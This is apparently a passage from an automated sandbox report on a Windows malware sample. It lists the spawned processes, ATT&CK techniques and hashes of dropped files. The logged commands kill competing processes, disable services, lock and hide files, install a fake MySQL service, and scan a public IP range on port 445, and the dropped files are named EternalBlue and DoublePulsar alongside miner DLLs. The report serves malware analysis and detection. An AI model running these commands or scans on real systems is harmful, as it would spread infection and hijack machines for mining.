      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im WUDHostService.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2056
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmose.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4076
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im 1sass.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvc.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3460
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2284
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TasksHostServices.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2732
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TasksHostService.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im crss.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im svsohst.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4736
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im seser.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4012
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im msinfo.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3572
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2736
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im csrs.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:920
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im path.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3708
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im svschost.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1452
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mscteui.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1004
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im spoolsrv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TrueServiceHost.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ServicesMgrHost.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4656
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im GoogleCdoeUpdate.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TrustedHostex.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1616
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im svhost.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im WUDFHosts.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2052
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im scvhost.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2556
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im csrse.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4452
  - - C:\Windows\SysWOW64\net.exe
      net stop "mssecsvc2.0"
      4⤵
      PID:2888
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "mssecsvc2.0"
        5⤵
        
        PID:2468
  - - C:\Windows\SysWOW64\net.exe
      net stop "mssecsvc2.1"
      4⤵
      PID:4676
  - - C:\Windows\SysWOW64\net.exe
      net stop "lbpuamoqhpoqju171"
      4⤵
      PID:4444
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "lbpuamoqhpoqju171"
        5⤵
        
        PID:3876
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "tjuldl"
      4⤵
      Launches sc.exe
      PID:4516
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "dbuxbr"
      4⤵
      Launches sc.exe
      PID:1644
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "lbpuamoqhpoqju171"
      4⤵
      Launches sc.exe
      PID:3636
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "mssecsvc2.0"
      4⤵
      Launches sc.exe
      PID:2884
  - - C:\Windows\SysWOW64\sc.exe
      sc config "fastuserswitchingcompatibility" start= disabled
      4⤵
      Launches sc.exe
      PID:2404
  - - C:\Windows\SysWOW64\sc.exe
      sc config "tjuldl" start= disabled
      4⤵
      Launches sc.exe
      PID:3668
  - - C:\Windows\SysWOW64\sc.exe
      sc config "dbuxbr" start= disabled
      4⤵
      Launches sc.exe
      PID:4976
  - - C:\Windows\SysWOW64\sc.exe
      sc config "mssecsvc2.0" start= disabled
      4⤵
      Launches sc.exe
      PID:4172
  - - C:\Windows\SysWOW64\sc.exe
      sc config "lbpuamoqhpoqju171" start= disabled
      4⤵
      Launches sc.exe
      PID:964
  - - C:\Windows\SysWOW64\sc.exe
      sc config "mssecsvc2.1" start= disabled
      4⤵
      Launches sc.exe
      PID:2276
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:932
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "mssecsvc2.1"
      4⤵
      Launches sc.exe
      PID:3468
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "fastuserswitchingcompatibility"
      4⤵
      Launches sc.exe
      PID:788
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvc.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3420
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im tasksche.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3748
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\svchost.exe'" Call Terminate
      4⤵
      Kills process with WMI
      Suspicious use of AdjustPrivilegeToken
      PID:4872
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='taskhost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\taskhost.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:456
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\Windows\\mssecsvr.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:3880
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:3036
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:1648
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2464
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvr.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:4000
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:4032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1144
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\mssecsvr.exe /p system:n
      4⤵
      PID:532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4240
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\mssecsvc.exe /p system:n
      4⤵
      PID:4180
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3568
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\tasksche.exe /p system:n
      4⤵
      PID:2008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4932
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\qeriuwjhrf /p system:n
      4⤵
      PID:3572
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im conhosts.exe
      4⤵
      Kills process with taskkill
      PID:3496
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmose.exe
      4⤵
      Kills process with taskkill
      PID:4144
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmosee.exe
      4⤵
      Kills process with taskkill
      PID:4184
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='conhosts.exe' And ExecutablePath='C:\\Windows\\Temp\\conhosts.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2520
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='conhost.exe' And ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2780
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\help\\lsmosee.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:5472
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\help\\lsmose.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:5840
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\debug\\lsmosee.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:5872
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:5904
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='conime.exe' And ExecutablePath='C:\\Progra~1\\Common~1\\conime.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:5940
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r c:\windows\web\*.bat
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:5976
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\WINDOWS\Web\*.vbs
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:5992
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\WINDOWS\Debug\item.dat
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:6008
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\Windows\Temp\conhost.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:6024
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\Windows\help\lsmose.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:6040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6056
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\help\lsmosee.exe /p system:n
      4⤵
      PID:6064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6084
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\help\lsmose.exe /p system:n
      4⤵
      PID:6092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6112
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\lsmosee.exe /p system:n
      4⤵
      PID:6120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6140
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\lsmose.exe /p system:n
      4⤵
      PID:3568
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Progra~1\Common~1\conime.exe /p system:n
      4⤵
      PID:5832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5476
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Temp\*.exe /p system:n
      4⤵
      PID:5516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5856
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Temp\conhost.exe /p system:n
      4⤵
      PID:5844
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3912
  - - C:\Windows\SysWOW64\cacls.exe
      cacls c:\windows\web\*.bat /p system:n
      4⤵
      PID:916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5836
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\WINDOWS\Web\*.vbs /p system:n
      4⤵
      PID:2224
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5892
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\WINDOWS\Debug\item.dat /p system:n
      4⤵
      PID:5880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5920
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\xmrstak_cuda_backend.dll /p system:n
      4⤵
      PID:5928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5960
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\xmrstak_opencl_backend.dll /p system:n
      4⤵
      PID:5948
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64
      4⤵
      Views/modifies file attributes
      PID:5984
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64
      4⤵
      Views/modifies file attributes
      PID:6000
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe
      4⤵
      Views/modifies file attributes
      PID:6016
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe
      4⤵
      Views/modifies file attributes
      PID:6032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6052
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
      4⤵
      PID:6060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6076
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
      4⤵
      PID:6088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6104
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g system:F
      4⤵
      PID:6116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:6124
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g everyone:F
      4⤵
      PID:4932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3568
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
      4⤵
      PID:5616
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4488
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
      4⤵
      PID:3648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5516
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
      4⤵
      PID:5848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5844
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
      4⤵
      PID:1384
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:916
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
      4⤵
      PID:100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5884
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
      4⤵
      PID:2924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4536
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
      4⤵
      PID:5908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5944
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
      4⤵
      PID:5968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5948
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Fonts\Mysql\same.bat /p system:n
      4⤵
      PID:6004
- C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe
  "C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe" "C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
  2⤵
  - Deletes itself
  - Executes dropped EXE
  PID:2404

C:\Windows\Fonts\Mysql\svchost.exe
svchost stop "MicrosoftMysql"
1⤵
- Executes dropped EXE
PID:3356

C:\Windows\Fonts\Mysql\svchost.exe
svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
1⤵
- Executes dropped EXE
PID:2460

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 20
1⤵
- Runs ping.exe
PID:4772

C:\Windows\Fonts\Mysql\svchost.exe
svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
1⤵
- Executes dropped EXE
PID:5112

C:\Windows\Fonts\Mysql\svchost.exe
svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
1⤵
- Executes dropped EXE
PID:552

C:\Windows\SysWOW64\sc.exe
sc delete "MicrosoftMssql"
1⤵
- Launches sc.exe
PID:2204

C:\Windows\SysWOW64\sc.exe
sc delete "MicrosoftMysql"
1⤵
- Launches sc.exe
PID:4300

C:\Windows\Fonts\Mysql\svchost.exe
svchost stop "MicrosoftFonts"
1⤵
- Executes dropped EXE
PID:2164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MicrosoftMssql"
1⤵
PID:760

C:\Windows\SysWOW64\net.exe
net stop "MicrosoftMssql"
1⤵
- Suspicious use of WriteProcessMemory
PID:4576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MicrosoftMysql"
1⤵
PID:4908

C:\Windows\SysWOW64\net.exe
net stop "MicrosoftMysql"
1⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\Fonts\Mysql\svchost.exe
C:\Windows\Fonts\Mysql\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\Mysql\cmd.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\SysWOW64\mode.com
    mode con cols=50 lines=40
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\sc.exe
    sc config Browser start= auto
    3⤵
    - Launches sc.exe
    PID:1700
- - C:\Windows\SysWOW64\sc.exe
    sc config lanmanworkstation start= auto
    3⤵
    - Launches sc.exe
    PID:3236
- - C:\Windows\SysWOW64\sc.exe
    sc config lanmanserver start= auto
    3⤵
    - Launches sc.exe
    PID:3140
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:3108
- - C:\Windows\SysWOW64\net.exe
    net start Browser
    3⤵
    PID:2060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Browser
      4⤵
      PID:3376
- - C:\Windows\SysWOW64\net.exe
    net start lanmanworkstation
    3⤵
    PID:1876
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start lanmanworkstation
      4⤵
      PID:2024
- - C:\Windows\SysWOW64\net.exe
    net start lanmanserver
    3⤵
    PID:1260
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start lanmanserver
      4⤵
      PID:3316
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:3500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:3904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mance.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3944
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Eter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im puls.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4216
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mance.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Eter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mance.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im puls.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im puls.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3300
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1 -n 5
    3⤵
    - Runs ping.exe
    PID:2008
- - C:\Windows\Fonts\Mysql\wget.exe
    wget -O temp.txt "http://v4.ipv6-test.com/api/myip.php"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:3628
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1 -n 3
    3⤵
    - Runs ping.exe
    PID:2808
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1 -n 3
    3⤵
    - Runs ping.exe
    PID:2388
- - C:\Windows\Fonts\Mysql\taskhost.exe
    taskhost.exe tcp 89.149.0.254 89.149.255.254 445 450 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:5032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Schedule
1⤵
PID:3316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "mssecsvc2.1"
1⤵
PID:1668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe

Filesize
37KB

MD5
a48b642733b4ed0b2f63c726bea5710f

SHA1
f383f6eb661b6aea3da2f4f2b21b2cbc40ced2a2

SHA256
58361275c9ce4b07a6ee13ddc83f80e88571ea9d4e1aedc476f7d613938b47a6

SHA512
3f43721db1ec77ff2c31e6269bed3bd6e6c0d7577cfcfe913d771da19154819e6868d995f29830623ec568b666d17639b1dd3f2e0e6bf2a21ab4b43f967a9ef6

Download Submit
C:\Windows\Fonts\Mysql\Doublepulsar2.dll

Filesize
84KB

MD5
a1dcc5c46acec31002c3273d84e9c990

SHA1
1d998a6dc7a27f13359008d51b4e5d5f155b281c

SHA256
c8fee8d909b05f808257171dd83d310deebb97bf8a495ef8d3791e6ac61bba4c

SHA512
c636311dd4c47fa35856eaa32ffe1f942c8162880e21e297220a4704ddd40445a367b780e5cbea04569100bd719149207f343a86936fe5a6061b940e9dd0dd85

Download Submit
C:\Windows\Fonts\Mysql\Eternalblue2.dll

Filesize
69KB

MD5
e50a77d7def8dd3008541c5cb5378ff8

SHA1
c548ae83bf7258371d20576483dfc40d5c5b5ba2

SHA256
958e1435f2c1665ca53231454cf8fbc9a4d75426bae3e12c51bdf33d495e3e0c

SHA512
6890ed62eaf1282feee837b6194ae937dbc2df8bbb5fa3775f1d337ca6cf6de41b5e390af488125cc334acfd3d4c85f61265294ad7ecffd9bbdb4614ff5a98ed

Download Submit
C:\Windows\Fonts\Mysql\cmd.bat

Filesize
25KB

MD5
66b66dc0eb2437b233a8256b9a02902f

SHA1
0f8664e738f52053e5b4f07812b76647bde52c9a

SHA256
241328fd46d6ddea11cb6ed2514a950a083e623fbdd9a02602a5696e8b6b6a0e

SHA512
adffc967593f7632462ee458878354f8348951677295678222f9a7a86ac3ffd333d364cea1f87c2fa26860b6208d49b66a96ec23f662474d3e43fc5a5977e4be

Download Submit
C:\Windows\Fonts\Mysql\ctfmon.exe

Filesize
2.2MB

MD5
762ed51daa67d2a6a4ea641ec5a5b6f3

SHA1
9d6f2b7db9b2ee86206fc209824bd4fc23f594cd

SHA256
181ce9db0dea2a3a2e08860620c3015e61995a93729cb07e0b157d0e75c73343

SHA512
8bd5eb9759acb4d416788c1ef0233105feb52658d60553d9dd1171554cc7fa59c37f79043702abf86400173dc95511b76f0ea310e8446cf7b952f826a2204602

Download Submit
C:\Windows\Fonts\Mysql\ctfmon.exe

Filesize
2.2MB

MD5
cf58a95b129a54da7440a2414e2406a5

SHA1
